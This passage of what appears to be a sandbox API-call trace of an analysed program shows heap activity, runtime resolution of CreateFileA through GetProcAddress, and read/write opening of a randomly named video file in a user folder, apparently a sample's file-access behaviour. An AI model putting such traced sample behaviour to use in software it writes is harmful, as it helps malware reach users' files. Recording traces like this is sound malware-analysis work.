Size=0x10) returned 0x9bd7f8 [0192.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0192.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0192.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0192.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0192.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0192.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0192.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0192.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0192.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0192.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0192.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0192.640] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0192.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0192.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0192.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0192.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0192.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0192.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0192.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0192.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0192.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0192.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0192.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0192.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0192.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0192.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0192.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0192.642] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0192.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0192.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0192.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0192.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0192.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0192.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0192.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0192.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0192.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0192.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0192.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0192.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0192.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0192.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0192.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0192.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.645] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0192.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba4f8 [0192.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba4f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0192.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.646] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0192.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0192.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4f8 [0192.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba4f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0192.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.646] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0192.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0192.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0192.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0192.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0192.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0192.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0192.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0192.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0192.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0192.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x48) returned 0x9aa548 [0192.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv", cchWideChar=72, lpMultiByteStr=0x9aa548, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv", lpUsedDefaultChar=0x0) returned 72 [0192.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0192.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0192.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0192.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0192.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0192.647] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf\\gwljrbpo46x9neds.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0192.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0192.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0192.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0192.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0192.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0192.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0192.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0192.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0192.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0192.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0192.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=72, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0192.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0192.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=72, lpWideCharStr=0x8edfa0, cchWideChar=72 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv") returned 72 [0192.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0192.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0192.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0192.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0192.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0192.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0192.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0192.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0192.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0192.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0192.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0192.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0192.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0192.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0192.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0192.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0192.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0192.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0192.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0192.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0192.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0192.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0192.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0192.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0192.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0192.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0192.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0192.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0192.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0192.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0192.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0192.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0192.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0192.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0192.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0192.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0192.652] RtlAllocateHeap (HeapHandle=0x8a0000, 